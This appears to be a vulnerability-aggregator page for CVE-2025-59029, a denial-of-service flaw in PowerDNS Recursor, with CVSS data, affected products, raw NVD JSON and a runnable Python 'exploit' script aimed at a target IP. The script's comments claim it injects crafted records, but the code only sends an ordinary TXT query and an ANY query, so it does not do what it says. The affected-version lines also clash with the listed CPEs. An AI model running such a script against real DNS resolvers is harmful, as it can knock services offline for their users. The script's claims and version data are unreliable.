Security Vulnerability Report
中文
CVE-2025-59029 CVSS 5.3 MEDIUM

CVE-2025-59029

Published: 2025-12-09 16:17:59
Last Modified: 2026-02-19 17:13:49
Source: [email protected]

Description

An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then send a query with qtype set to ANY.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:powerdns:recursor:5.3.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:powerdns:recursor:5.3.1:*:*:*:*:*:*:* - VULNERABLE
PowerDNS Recursor < 5.10.0
PowerDNS Recursor < 5.9.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59029 PoC - PowerDNS Recursor Assertion Failure # This PoC demonstrates triggering assertion failure via crafted DNS records import socket import struct import random import time def build_dns_query(qname, qtype='ANY'): """Build a DNS query packet""" # Transaction ID txid = random.randint(0, 65535) # Flags: standard query flags = 0x0100 # Questions: 1 qdcount = 1 # Answer/Authority/Additional: 0 ancount = 0 nsccount = 0 arcount = 0 # Build header header = struct.pack('>HHHHHH', txid, flags, qdcount, ancount, nsccount, arcount) # Build question section labels = qname.split('.') qsection = b'' for label in labels: qsection += struct.pack('B', len(label)) + label.encode() qsection += b'\x00' # End of domain name # Qtype mapping qtype_map = {'A': 1, 'AAAA': 28, 'ANY': 255, 'TXT': 16, 'MX': 15} qtype_val = qtype_map.get(qtype, 255) # Qclass: IN (1) qsection += struct.pack('>HH', qtype_val, 1) return header + qsection def send_dns_query(target_ip, target_port, qname, qtype='ANY'): """Send DNS query and receive response""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) query = build_dns_query(qname, qtype) try: sock.sendto(query, (target_ip, target_port)) response, addr = sock.recvfrom(512) return response except socket.timeout: return None finally: sock.close() def exploit_cve_2025_59029(target_ip, target_port=53): """ Exploit CVE-2025-59029: PowerDNS Recursor Assertion Failure Attack flow: 1. Inject crafted DNS records into cache 2. Wait for cache insertion 3. Send ANY query to trigger assertion failure """ print(f"[*] Targeting PowerDNS Recursor at {target_ip}:{target_port}") print(f"[*] CVE-2025-59029: Assertion failure via crafted DNS records") # Target domain (should be configured for the target environment) target_domain = "vulnerable-record.example.com" # Step 1: Query to cache crafted records (if we have control over zone) print(f"[+] Step 1: Querying records for {target_domain}") send_dns_query(target_ip, target_port, target_domain, 'TXT') # Wait for cache insertion time.sleep(1) # Step 2: Send ANY query to trigger assertion failure print(f"[+] Step 2: Sending ANY query to trigger assertion failure") response = send_dns_query(target_ip, target_port, target_domain, 'ANY') if response: print(f"[!] Response received - assertion may not have triggered") print(f"[+] Response length: {len(response)} bytes") else: print(f"[!] No response - assertion failure may have occurred (DoS successful)") return True if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_59029_poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 53 exploit_cve_2025_59029(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59029", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:58.990", "lastModified": "2026-02-19T17:13:48.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then send a query with qtype set to ANY."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:5.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "60EB1FF6-8039-4F08-B943-13DFC479433B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:5.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "2C2B07F4-3564-444F-AD04-26B956E06EB3"}]}]}], "references": [{"url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-07.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.